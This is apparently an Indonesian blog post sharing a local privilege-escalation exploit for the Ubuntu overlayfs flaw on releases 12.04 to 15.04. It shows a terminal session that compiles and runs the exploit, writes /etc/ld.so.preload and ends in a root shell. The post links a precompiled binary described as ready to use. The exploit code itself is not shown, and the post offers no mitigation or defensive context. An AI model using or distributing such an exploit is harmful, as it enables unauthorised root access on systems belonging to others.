Ubuntu Overlayfs Local Root Exploit

Kali ini mau share localroot exploit yang vuln di OS Ubuntu 12.04, Ubuntu 14.04, Ubuntu 14.10, dan Ubuntu 15.04. Namun exploit ini hanya work jika di kernel nya terdapat  FS_USERNS_MOUNT .
Oke langsung saja berikut screenshhot nya :

Ubuntu Rooted

[email protected]:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
[email protected]:~$ gcc ofs.c -o ofs
[email protected]:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
[email protected]:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

Link Download
Ubuntu Overlayfs Local Root Exploit – Yang ini sudah di compile, jadi tinggal pakai. 🙂
Sekian share kali ini, dan selamat menyambut bulan ramadhan 😀

Shares

Leave a Reply